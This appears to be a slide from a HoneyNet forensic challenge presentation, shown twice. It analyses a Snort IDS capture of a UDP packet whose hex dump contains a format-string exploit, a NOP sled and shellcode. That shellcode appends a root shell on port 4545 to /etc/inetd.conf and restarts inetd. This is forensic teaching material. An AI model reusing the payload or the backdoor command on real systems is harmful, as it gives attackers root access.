First page Back Continue Last page Summary Graphics

The HoneyNet Forensic Challenge --Analysis & Findings

The Exploit
11/07-23:11:50.870124 216.216.74.2:710 -> 172.16.1.107:871
UDP TTL:42 TOS:0x0 ID:16143
Len: 456
3E D1 BA B6 00 00 00 00 00 00 00 02 00 01 86 B8 >...............
00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 01 67 04 F7 FF BF ...........g....
04 F7 FF BF 05 F7 FF BF 05 F7 FF BF 06 F7 FF BF ................
06 F7 FF BF 07 F7 FF BF 07 F7 FF BF 25 30 38 78 ............%08x
20 25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 %08x %08x %08x
25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 %08x %08x %08x %
30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 08x %08x %08x %0
38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 38 8x %08x %08x %08
78 20 25 30 32 34 32 78 25 6E 25 30 35 35 78 25 x %0242x%n%055x%
6E 25 30 31 32 78 25 6E 25 30 31 39 32 78 25 6E n%012x%n%0192x%n
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 EB 4B 5E 89 76 AC 83 EE 20 8D 5E 28 83 C6 ...K^.v... .^(..
20 89 5E B0 83 EE 20 8D 5E 2E 83 C6 20 83 C3 20 .^... .^... ..
83 EB 23 89 5E B4 31 C0 83 EE 20 88 46 27 88 46 ..#.^.1... .F'.F
2A 83 C6 20 88 46 AB 89 46 B8 B0 2B 2C 20 89 F3 *.. .F..F..+, ..
8D 4E AC 8D 56 B8 CD 80 31 DB 89 D8 40 CD 80 E8 .N..V...1...@...
B0 FF FF FF 2F 62 69 6E 2F 73 68 20 2D 63 20 65 ..../bin/sh -c e
63 68 6F 20 34 35 34 35 20 73 74 72 65 61 6D 20 cho 4545 stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 20 3E 3E /bin/sh sh -i >>
20 2F 65 74 63 2F 69 6E 65 74 64 2E 63 6F 6E 66 /etc/inetd.conf
3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 6E ;killall -HUP in
65 74 64 00 00 00 00 09 6C 6F 63 61 6C 68 6F 73 etd.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Notes:

Snort IDS log -- shellcode packet
Interesting stuff is near the end.

The payload injects a rootshell bound to port 4545 into /etc/inetd.conf then signals the inetd daemon to reread the the configuration

The HoneyNet Forensic Challenge --Analysis & Findings

The Exploit

11/07-23:11:50.870124 216.216.74.2:710 -> 172.16.1.107:871

UDP TTL:42 TOS:0x0 ID:16143

Len: 456

3E D1 BA B6 00 00 00 00 00 00 00 02 00 01 86 B8 >...............

00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 01 67 04 F7 FF BF ...........g....

04 F7 FF BF 05 F7 FF BF 05 F7 FF BF 06 F7 FF BF ................

06 F7 FF BF 07 F7 FF BF 07 F7 FF BF 25 30 38 78 ............%08x

20 25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 %08x %08x %08x

25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 %08x %08x %08x %

30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 08x %08x %08x %0

38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 38 8x %08x %08x %08

78 20 25 30 32 34 32 78 25 6E 25 30 35 35 78 25 x %0242x%n%055x%

6E 25 30 31 32 78 25 6E 25 30 31 39 32 78 25 6E n%012x%n%0192x%n

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

90 90 EB 4B 5E 89 76 AC 83 EE 20 8D 5E 28 83 C6 ...K^.v... .^(..

20 89 5E B0 83 EE 20 8D 5E 2E 83 C6 20 83 C3 20 .^... .^... ..

83 EB 23 89 5E B4 31 C0 83 EE 20 88 46 27 88 46 ..#.^.1... .F'.F

2A 83 C6 20 88 46 AB 89 46 B8 B0 2B 2C 20 89 F3 *.. .F..F..+, ..

8D 4E AC 8D 56 B8 CD 80 31 DB 89 D8 40 CD 80 E8 .N..V...1...@...

B0 FF FF FF 2F 62 69 6E 2F 73 68 20 2D 63 20 65 ..../bin/sh -c e

63 68 6F 20 34 35 34 35 20 73 74 72 65 61 6D 20 cho 4545 stream

74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root

2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 20 3E 3E /bin/sh sh -i >>

20 2F 65 74 63 2F 69 6E 65 74 64 2E 63 6F 6E 66 /etc/inetd.conf

3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 6E ;killall -HUP in

65 74 64 00 00 00 00 09 6C 6F 63 61 6C 68 6F 73 etd.....localhos

74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Notes: